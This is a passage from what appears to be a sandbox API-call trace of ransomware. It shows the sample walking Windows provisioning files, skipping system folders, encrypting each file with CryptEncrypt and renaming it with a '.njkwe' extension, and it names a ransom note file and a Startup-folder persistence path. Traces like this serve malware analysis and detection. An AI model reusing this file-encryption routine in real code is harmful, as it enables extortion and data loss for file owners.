lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.858] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.858] CloseHandle (hObject=0x43c) returned 1 [0077.858] GetProcessHeap () returned 0xbe0000 [0077.858] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.858] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\276__Connections_Cellular_KPN-Hi (Netherlands)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0077.858] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\276__Connections_Cellular_KPN-Hi (Netherlands)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\276__connections_cellular_kpn-hi (netherlands)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\276__Connections_Cellular_KPN-Hi (Netherlands)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\276__connections_cellular_kpn-hi (netherlands)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.859] GetProcessHeap () returned 0xbe0000 [0077.859] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.859] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90a7a428, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90a7a428, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90a7a428, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2e2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="277__Connections_Cellular_KPN-Hi (Netherlands)_i1$(__MVID)@WAP.provxml", cAlternateFileName="277__C~1.PRO")) returned 1 [0077.859] lstrcmpiW (lpString1="277__Connections_Cellular_KPN-Hi (Netherlands)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.859] lstrcmpiW (lpString1="277__Connections_Cellular_KPN-Hi (Netherlands)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.859] lstrcmpiW (lpString1="277__Connections_Cellular_KPN-Hi (Netherlands)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.859] lstrcmpiW (lpString1="277__Connections_Cellular_KPN-Hi (Netherlands)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.859] lstrcmpiW (lpString1="277__Connections_Cellular_KPN-Hi (Netherlands)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.859] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\277__Connections_Cellular_KPN-Hi (Netherlands)_i1$(__MVID)@WAP.provxml") returned 164 [0077.859] StrStrIW (lpFirst="277__Connections_Cellular_KPN-Hi (Netherlands)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.859] lstrcmpW (lpString1="277__Connections_Cellular_KPN-Hi (Netherlands)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.859] lstrcmpW (lpString1="277__Connections_Cellular_KPN-Hi (Netherlands)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.859] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\277__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.859] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\277__Connections_Cellular_KPN-Hi (Netherlands)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\277__connections_cellular_kpn-hi (netherlands)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.860] GetTickCount () returned 0x1153cc7 [0077.860] GetTickCount () returned 0x1153cc7 [0077.860] GetTickCount () returned 0x1153cc7 [0077.860] GetTickCount () returned 0x1153cc7 [0077.860] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.860] GetProcessHeap () returned 0xbe0000 [0077.860] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.860] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2e2, lpOverlapped=0x0) returned 1 [0077.861] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.862] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2e2, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2e2, lpOverlapped=0x0) returned 1 [0077.862] GetProcessHeap () returned 0xbe0000 [0077.862] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.862] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.862] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.862] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.862] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.862] CloseHandle (hObject=0x43c) returned 1 [0077.862] GetProcessHeap () returned 0xbe0000 [0077.862] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.862] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\277__Connections_Cellular_KPN-Hi (Netherlands)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0077.862] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\277__Connections_Cellular_KPN-Hi (Netherlands)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\277__connections_cellular_kpn-hi (netherlands)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\277__Connections_Cellular_KPN-Hi (Netherlands)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\277__connections_cellular_kpn-hi (netherlands)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.863] GetProcessHeap () returned 0xbe0000 [0077.863] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.863] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90a7a428, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90a7a428, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90a7a428, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2dc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="278__Connections_Cellular_KPN-Hi (Netherlands)_i10$(__MVID)@WAP.provxml", cAlternateFileName="278__C~1.PRO")) returned 1 [0077.863] lstrcmpiW (lpString1="278__Connections_Cellular_KPN-Hi (Netherlands)_i10$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.863] lstrcmpiW (lpString1="278__Connections_Cellular_KPN-Hi (Netherlands)_i10$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.863] lstrcmpiW (lpString1="278__Connections_Cellular_KPN-Hi (Netherlands)_i10$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.863] lstrcmpiW (lpString1="278__Connections_Cellular_KPN-Hi (Netherlands)_i10$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.863] lstrcmpiW (lpString1="278__Connections_Cellular_KPN-Hi (Netherlands)_i10$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.863] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\278__Connections_Cellular_KPN-Hi (Netherlands)_i10$(__MVID)@WAP.provxml") returned 165 [0077.863] StrStrIW (lpFirst="278__Connections_Cellular_KPN-Hi (Netherlands)_i10$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.863] lstrcmpW (lpString1="278__Connections_Cellular_KPN-Hi (Netherlands)_i10$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.863] lstrcmpW (lpString1="278__Connections_Cellular_KPN-Hi (Netherlands)_i10$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.863] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\278__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.863] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\278__Connections_Cellular_KPN-Hi (Netherlands)_i10$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\278__connections_cellular_kpn-hi (netherlands)_i10$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.863] GetTickCount () returned 0x1153cc7 [0077.863] GetTickCount () returned 0x1153cc7 [0077.864] GetTickCount () returned 0x1153cc7 [0077.864] GetTickCount () returned 0x1153cc7 [0077.864] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.864] GetProcessHeap () returned 0xbe0000 [0077.864] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.864] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2dc, lpOverlapped=0x0) returned 1 [0077.866] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.866] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2dc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2dc, lpOverlapped=0x0) returned 1 [0077.866] GetProcessHeap () returned 0xbe0000 [0077.866] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.866] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.866] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.866] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.866] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.866] CloseHandle (hObject=0x43c) returned 1 [0077.866] GetProcessHeap () returned 0xbe0000 [0077.866] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.866] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\278__Connections_Cellular_KPN-Hi (Netherlands)_i10$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0077.866] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\278__Connections_Cellular_KPN-Hi (Netherlands)_i10$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\278__connections_cellular_kpn-hi (netherlands)_i10$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\278__Connections_Cellular_KPN-Hi (Netherlands)_i10$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\278__connections_cellular_kpn-hi (netherlands)_i10$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.867] GetProcessHeap () returned 0xbe0000 [0077.867] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.867] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90a7a428, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90a7a428, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90a7a428, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="279__Connections_Cellular_KPN-Hi (Netherlands)_i11$(__MVID)@WAP.provxml", cAlternateFileName="279__C~1.PRO")) returned 1 [0077.867] lstrcmpiW (lpString1="279__Connections_Cellular_KPN-Hi (Netherlands)_i11$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.867] lstrcmpiW (lpString1="279__Connections_Cellular_KPN-Hi (Netherlands)_i11$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.867] lstrcmpiW (lpString1="279__Connections_Cellular_KPN-Hi (Netherlands)_i11$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.867] lstrcmpiW (lpString1="279__Connections_Cellular_KPN-Hi (Netherlands)_i11$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.867] lstrcmpiW (lpString1="279__Connections_Cellular_KPN-Hi (Netherlands)_i11$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.867] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\279__Connections_Cellular_KPN-Hi (Netherlands)_i11$(__MVID)@WAP.provxml") returned 165 [0077.867] StrStrIW (lpFirst="279__Connections_Cellular_KPN-Hi (Netherlands)_i11$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.867] lstrcmpW (lpString1="279__Connections_Cellular_KPN-Hi (Netherlands)_i11$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.867] lstrcmpW (lpString1="279__Connections_Cellular_KPN-Hi (Netherlands)_i11$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.867] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\279__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.867] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\279__Connections_Cellular_KPN-Hi (Netherlands)_i11$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\279__connections_cellular_kpn-hi (netherlands)_i11$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.868] GetTickCount () returned 0x1153cc7 [0077.868] GetTickCount () returned 0x1153cc7 [0077.868] GetTickCount () returned 0x1153cc7 [0077.868] GetTickCount () returned 0x1153cc7 [0077.868] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.869] GetProcessHeap () returned 0xbe0000 [0077.869] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.869] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2e0, lpOverlapped=0x0) returned 1 [0077.879] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.880] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2e0, lpOverlapped=0x0) returned 1 [0077.880] GetProcessHeap () returned 0xbe0000 [0077.880] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.880] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.880] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.880] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.880] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.880] CloseHandle (hObject=0x43c) returned 1 [0077.880] GetProcessHeap () returned 0xbe0000 [0077.880] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.880] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\279__Connections_Cellular_KPN-Hi (Netherlands)_i11$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0077.880] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\279__Connections_Cellular_KPN-Hi (Netherlands)_i11$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\279__connections_cellular_kpn-hi (netherlands)_i11$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\279__Connections_Cellular_KPN-Hi (Netherlands)_i11$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\279__connections_cellular_kpn-hi (netherlands)_i11$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.881] GetProcessHeap () returned 0xbe0000 [0077.881] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.881] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901892f8, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x901892f8, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x901892f8, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x280, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="27__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml", cAlternateFileName="27__CO~1.PRO")) returned 1 [0077.881] lstrcmpiW (lpString1="27__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.881] lstrcmpiW (lpString1="27__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.881] lstrcmpiW (lpString1="27__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.881] lstrcmpiW (lpString1="27__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.881] lstrcmpiW (lpString1="27__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.881] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\27__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml") returned 155 [0077.881] StrStrIW (lpFirst="27__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.881] lstrcmpW (lpString1="27__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.881] lstrcmpW (lpString1="27__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.881] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\27__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.881] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\27__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\27__connections_cellular_a1 (austria)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.882] GetTickCount () returned 0x1153cd6 [0077.882] GetTickCount () returned 0x1153cd6 [0077.882] GetTickCount () returned 0x1153cd6 [0077.882] GetTickCount () returned 0x1153cd6 [0077.882] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 